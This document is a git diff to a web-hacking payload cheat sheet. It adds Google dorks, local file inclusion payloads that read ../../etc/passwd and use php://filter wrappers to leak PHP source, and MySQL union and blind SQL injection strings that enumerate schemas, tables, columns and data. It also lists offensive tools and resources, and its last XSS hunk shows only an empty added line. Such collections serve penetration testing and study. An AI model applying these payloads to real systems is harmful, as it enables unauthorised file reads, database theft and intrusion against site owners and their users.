diff --git a/Enumeration_and_fingerprinting.md b/Enumeration_and_fingerprinting.md index ef853bf..419effa 100644 --- a/Enumeration_and_fingerprinting.md +++ b/Enumeration_and_fingerprinting.md @@ -5,6 +5,8 @@ Google Dork to find subdomains ``` site:*.domain.com -www +site:http://domain.com ext:php +site:http://domain.com filtype:pdf ``` ## Scripts diff --git a/PHP include/README.md b/PHP include/README.md index 69dd577..482e888 100644 --- a/PHP include/README.md +++ b/PHP include/README.md @@ -11,10 +11,11 @@ http://example.com/index.php?page=../../etc/passwd http://example.com/index.php?page=%252e%252e%252f ``` -LFI Wrapper rot13 and base64 +LFI Wrapper rot13 and base64 - php://filter case insensitive ``` http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php +http://example.com/index.php?page=php=pHp://FilTer/convert.base64-encode/resource=index.php ``` LFI Wrapper zip diff --git a/README.md b/README.md index bd1ac96..7f796fd 100644 --- a/README.md +++ b/README.md @@ -9,9 +9,28 @@ Last modifications : * SQLi payloads improved * Enumeration added (WIP) -TODO : Basic methodology for hunting bugs and vulnerabilities +# Tools + +* [Web Developper](https://addons.mozilla.org/en-Gb/firefox/addon/web-developer/) +* [Hackbar](https://addons.mozilla.org/en-Gb/firefox/addon/hackbar/?src=search) +* [Burp Proxy](https://portswigger.net) +* [Fiddler](https://www.telerik.com/download/fiddler) +* [DirBuster](https://sourceforge.net/projects/dirbuster/) +* [GoBuster](https://github.com/OJ/gobuster) +* [Knockpy](https://github.com/guelfoweb/knock) +* [SQLmap](http://sqlmap.org) +* [Eyewitness](https://github.com/ChrisTruncer/EyeWitness) +* [Nikto](https://cirt.net/nikto2) +* [Recon-ng](https://bitbucket.org/LaNMaSteR53/recon-ng) # More resources Book's list: * Web Hacking 101 - https://leanpub.com/web-hacking-101 * The Web Application Hacker's Handbook - https://www.amazon.fr/Web-Application-Hackers-Handbook-Exploiting/dp/1118026470 + +Blogs/Websites +* http://blog.zsec.uk/101-web-testing-tooling/ +* https://blog.innerht.ml +* https://blog.zsec.uk +* https://www.exploit-db.com/google-hacking-database +* https://www.arneswinnen.net \ No newline at end of file diff --git a/SQL injection/README.md b/SQL injection/README.md index 4a1db6b..52994b3 100644 --- a/SQL injection/README.md +++ b/SQL injection/README.md @@ -33,10 +33,10 @@ SELECT id FROM users WHERE username='' or true-- AND password='input2' # MYSQL MySQL Union Based ``` -gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata -gRoUp_cOncaT(0x7c,table_name,0x7C)+fRoM+information_schema.tables+wHeRe+table_schema=... -gRoUp_cOncaT(0x7c,column_name,0x7C)+fRoM+information_schema.columns+wHeRe+table_name=... -gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+... +UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata +UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,table_name,0x7C)+fRoM+information_schema.tables+wHeRe+table_schema=... +UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,column_name,0x7C)+fRoM+information_schema.columns+wHeRe+table_name=... +UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+... ``` @@ -66,10 +66,10 @@ AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126) MySQL Blind with MAKE_SET ``` -MAKE_SET(YOLO<(SELECT(length(version()))),1) -MAKE_SET(YOLO=@) and (@)in (@:=concat(@,0x0D,0x0A,' [ ',table_schema,' ] > ',table_name,' > ',column_name,0x7C))))a)# (select (@) from (select(@:=0x00),(select (@) from (db_data.table_data) where (@)in (@:=concat(@,0x0D,0x0A,0x7C,' [ ',column_data1,' ] > ',column_data2,' > ',0x7C))))a)# - ``` # POSTGRESQL diff --git a/XSS injection/README.md b/XSS injection/README.md index 03c5392..5677013 100644 --- a/XSS injection/README.md +++ b/XSS injection/README.md @@ -46,6 +46,7 @@ Svg payload XSS for HTML5 ``` +